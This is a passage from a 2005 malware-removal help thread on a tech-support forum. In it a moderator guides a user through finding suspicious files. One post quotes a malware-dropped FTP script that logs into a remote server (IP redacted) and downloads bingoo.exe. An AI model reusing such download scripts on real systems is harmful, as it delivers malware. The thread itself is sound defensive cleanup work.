[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
  • 0

#100
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Can you look for these files please:

cdtime.asp
mpdrv.dbx
kimo.exe
bla.txt
2pac.txt


Let me know which ones you find and where.

Regards,
  • 0

Advertisements


#101
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello found 2
kimo.exe-01a0130c.pfc
2pac.txt c\windows\system32
  • 0

#102
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
whoops forgot to add
kimo.exe-01a0130c.pfc c\windows\prefetch
  • 0

#103
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
OK. The file in the prefetch folder can be deleted. It is useless to us.
Can you open
c:\windows\system32\2pac.txt
and post what's inside.

Regards,
  • 0

#104
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello
details are
open IP address removed by Metallica 10087
user [bleep] rulez
binary
get bingoo.exe
quit

cheers

Edited by Metallica, 04 August 2005 - 03:37 AM.

  • 0

#105
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
I found kimo.exe on the server your computer was hailing.

I'll see if I can get it removed.

I will remove the information from your last post after writing that down.

That looks like another link to a virus

Can you see if bingoo.exe is present on your computer?

Regards,
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP